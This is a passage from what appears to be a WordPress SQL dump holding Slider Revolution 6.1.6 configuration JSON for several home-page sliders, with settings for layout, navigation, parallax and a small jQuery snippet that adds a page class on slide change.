tY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false}}','{\"version\":\"6.1.6\"}',''),(2,'Home 1','home1','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home1\\\\\\\"]\",\"layouttype\":\"fullwidth\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"3000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1440,\"t\":778,\"m\":480},\"height\":{\"d\":655,\"n\":600,\"t\":760,\"m\":680},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi2.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"70\",\"height\":\"70\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":true,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1024\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":true,\"rtl\":false,\"style\":3,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"23\",\"align\":\"slider\",\"space\":\"14\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":true,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.1.6\"}','{\"version\":\"6.1.6\"}',''),(3,'Home 2','home2','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home2\\\\\\\"]\",\"layouttype\":\"fullscreen\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"notransition\",\"transitionDuration\":\"\",\"delay\":\"2100\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1441,\"t\":778,\"m\":480},\"height\":{\"d\":868,\"n\":768,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi3.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":true,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1024\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":true,\"rtl\":false,\"style\":3006,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"1\",\"offsetY\":\"37\",\"align\":\"slider\",\"space\":\"14\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.1.6\"}','{\"version\":\"6.1.6\"}',''),(4,'Home 3','home-3','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home-3\\\\\\\"]\",\"layouttype\":\"fullscreen\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"3000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"Linear.easeNone\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":800,\"t\":778,\"m\":480},\"height\":{\"d\":868,\"n\":768,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi4.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"Power3.easeInOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#eff0ea\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":true,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"\",\"hideDelayMobile\":\"\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1050\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":true,\"rtl\":false,\"style\":3006,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"18\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.1.6\"}','{\"version\":\"6.1.6\"}',''),(5,'Home 4','home-4','{\"id\":\"\",\"shortcode\":\"[rev_slider 